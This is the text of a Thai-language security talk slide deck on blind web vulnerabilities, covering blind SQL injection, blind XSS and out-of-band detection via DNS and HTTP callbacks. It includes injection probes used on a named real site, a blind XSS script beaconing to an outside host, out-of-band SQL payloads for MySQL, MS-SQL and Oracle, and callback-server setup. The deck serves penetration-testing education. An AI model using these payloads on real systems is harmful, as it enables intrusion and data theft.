Exploiting Blind VulnerabilitiesA tale of webapp security wizard

Pichaya MorimotoIT Security Consultant, SEC Consult (Thailand) Co.,Ltd.

GIAC Web Application Penetration Tester Certified

Pichaya MorimotoIT Security ConsultantSEC Consult (Thailand) Co., Ltd.

whoami

สอนแฮกเว็บแบบแมวๆ

https://www.facebook.com/longhackzhttps://www.youtube.com/user/pich4ya

Hacking Competition (Pwnladin Team)

Security Advisories

Security Advisories

https://www.limesurvey.org/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015

Public Exploits

SEC Consult - Who we are

★ Advisor for information security

★ Expert for the implementation of security processes and policies (ISO 27001, BS 25999, GSHB)

★ Leading company for technical security audits

★ Specialist for web application security according to ONR 17700

★ Independent of product manufacturers

★ Our customers are public authorities, financial institutions and insurance companies in Central Europe

★ Sectoral orientation (defence, public, finance, industry)

SEC Consult - Who we are

entire company within certification scope

certified since 16.01.2008

ISO/IEC 27001 Certificate

SEC Consult Vulnerability Lab

European leading research lab for the identification of vulnerabilities and the analysis of new technologies, products and applications (security advisories)

Integral part of the education and the further training of the security experts at SEC Consult

Early information of our customers due to SEC Consult security alerts

Support of well-known manufacturers to enhance the security of their products

Companies and organisations SEC Consult has released security advisories for (excerpt). For details see: http://www.sec-consult.com/72.html

Contact SEC Consult

★ Vulnerabilities and Exploits★ Blind Vulnerabilities★ Exploitation Techniques★ Setup Environment★ Demo

Overview

Network

Application Level

OS

Application

Web App

www.facebook.com

System: Facebook (Simplified version)

Attack Surface

Web as an Attack Surface:- User Input

- HTTP Header- HTTP Body

- Control Flow- Abuse path of

web execution

Vulnerabilities

OWASP Top 10 for 2013:★ A1 Injection★ A2 Broken Authentication and Session Management★ A3 Cross-Site Scripting (XSS)★ A4 Insecure Direct Object References★ A5 Security Misconfiguration★ A6 Sensitive Data Exposure★ A7 Missing Function Level Access Control★ A8 Cross-Site Request Forgery (CSRF)★ A9 Using Components with Known Vulnerabilities★ A10 Unvalidated Redirects and Forwards

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

SQL Injection

SQL Injection

SQL Injection

SELECT text, description FROM news WHERE description LIKE '%let's go%'

SELECT text, description FROM news WHERE description LIKE '%let's go%'

SQL Injection: UNION

Non-blind Vulnerability

YOU ARE NOT BLIND !สามารถนําขอมูลออกมาไดโดยตรงบนหนาเว็บ

sqlite_master.sql

SQL Injection: UNION

SQL Injection: UNION

PWNED

แลวถา...

ขอมูลที่ SELECT ออกมาไมไดถูกนําไปแสดง หรือเปน SQL query แบบ..

- UPDATE- INSERT- DELETE- อื่น ๆ ที่ไมไดแสดงผลลัพธ

Introduction to BLIND Vulnerabilities

Case Study: TreeOfSavior.com

การแฮกเจาะระบบเขาไปในระบบใด ๆ ที่เจาของระบบไมอนุญาติ ใหเราทดสอบระบบ เปนสิ่งผิดกฏหมาย ทําแลวอาจติดคุกหรือโดนปรับ เปนคดีอาญายอมความไมได

Legal Warning: คําเตือน

April 26, 2016: ตอนเชา

April 26, 2016 : ตอนเที่ยงวัน...

April 26, 2016 : ตอนเที่ยงคืน...

April 27, 2016 : ตี 1

BLIND SQL Injection: Probe

aaaaa' or (1=1) or 'bbbbbb

BLIND SQL Injection: Probe

aaaaa' or (1=2) or 'bbbbbb

BLIND SQL Injection: Probe

aaaaa' order by contentz-- -

BLIND SQL Injection: Probe

aaaaa' order by content-- -

BLIND SQL Injection: Exploit

★ information_schema

★ mysql★ performance_schema★ sys★ test★ tos_wiki

★ treeofsavior

SQLMapEZ EZ Script Kiddy!

Responsible Disclosure 101

Responsible Disclosure 101

ชองโหวอะไรอีกที่โจมตีแบบ Blind ได?

Cross-Site Scripting (XSS)

โชวคาที่รับมาจาก user input บนหนา HTML

Cross-Site Scripting (XSS)

http://127.0.0.1:1234/hello.php?name=<script>alert("let do something evil")</script>

ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ

Blind XSS?

ไมเห็นโดยตรง ก็ตองหาทางเห็นแบบออม ๆ ไปแทน..

How to Find Generic Blind Vulns

Exploit Payload ที่มีการทํา outbound

connection

เครื่องที่ถูกโจมตี รันโคดจาก exploit เพื่อทําอะไร

บางอยางใหคนโจมตีรูวาการโจมตีนั้นไดผล

ผูโจมตีไดรับขอมูลบางอยาง เพื่อพิสูจนไดวา ชองโหวที่

exploit ไปสําเร็จ

1

2

3

ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ HTTP Request !

Blind XSS

"><script>new Image().src="http://p7z.pw/xss1/?a=1337"</script>

ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ HTTP Request !

Blind XSS

IP คนโดน XSS IP เซิรฟเวอรรอรับผล

$ tail -n 1 /var/log/apache2/access.log[IP คนโดน XSS] - - [17/Jun/2016:18:38:30 -0400] "GET /xss1/?a=1337 HTTP/1.1" 404 492 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"

ไมเห็นโดยตรง ก็ตองหาทางเห็นแบบออม ๆ ไปแทน..

How to Find Generic Blind Vulns

Exploit Payload ที่มีการทํา outbound

connection

เครื่องที่ถูกโจมตี รันโคดจาก exploit เพื่อทําอะไร

บางอยางใหคนโจมตีรูวาการโจมตีนั้นไดผล

ผูโจมตีไดรับขอมูลบางอยาง เพื่อพิสูจนไดวา ชองโหวที่

exploit ไปสําเร็จ

1

2

3

A.k.a. Out-of-band (OBB) technique

★ MySQLLOAD_FILE('\\\\sqli1.p7z.pw\\')INTO OUTFILE '\\\\sqli2.p7z.pw\\test.txt'

★ MS-SQLOPENROWSET('SQLOLEDB', 'sqli3.p7z.pw';'a';'b', 'SELECT 1')EXEC master..xp_dirtree '\\sqli4.p7z.pw\' --

★ Oracle UTL_HTTP.request('sqli5.p7z.pw/?a='||(SELECT user FROM DUAL)

Probe for Blind SQL Injection

ที่มา: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

★ ICMP Ping Request - 3 กะโหลก★ HTTP Request - 4 กะโหลก★ NBNS Request - 1 กะโหลก★ FTP Login - 2 กะโหลก★ DNS Resolution - 5 กะโหลก

Outbound Traffic

★ ตองมี IP จริง เขาถึงไดจากอินเทอรเน็ต★ ควรจะเปนเครื่อง Linux สะดวกกวา Windows★ จด domain มาใชดวยจะดีมาก (ดูกันตอวาทําไม)★ ควรเปนเครื่องใน network ที่ไมโดน block port

หรือมีการใช proxyใด ๆ ที่แกไขขอมูลเขา-ออก

Setup Server for Testing

Setup VPS

1. Install apache22. Install bind9

Setup VPS

Setup Domain/DNS

ปแรก 200 บาท domain + whois

privacy แลว

ชื่อ domain เอาสั้น ๆ ที่สุดที่จะสั้นได

Setup Domain/DNS

Test DNS Resolution

Pros:★ เซิรฟเวอรทั่วไปมีโปรแกรม ping หางาย★ เร็วและงาย

Cons:★ บางเซิรฟเวอร block ปง!★ ชองโหวที่ไมใช Command Injection ใชไมได

#1 ICMP Ping Request

Pros:★ ...

Cons:★ บางเซิรฟเวอร block HTTP Outbound ไป untrusted IP !?

#2 HTTP Request

Pros:★ ไมมีเซิรฟเวอรที่ไหน block DNS

Cons:★ Setup ยุงยากเล็กนอยตอนเริ่ม

#3 DNS Resolution

DEMO

Find Blind Vuln with DNS Resolution

Thank you!

FB: สอนแฮกเว็บแบบแมว ๆhttps://fb.com/longhackz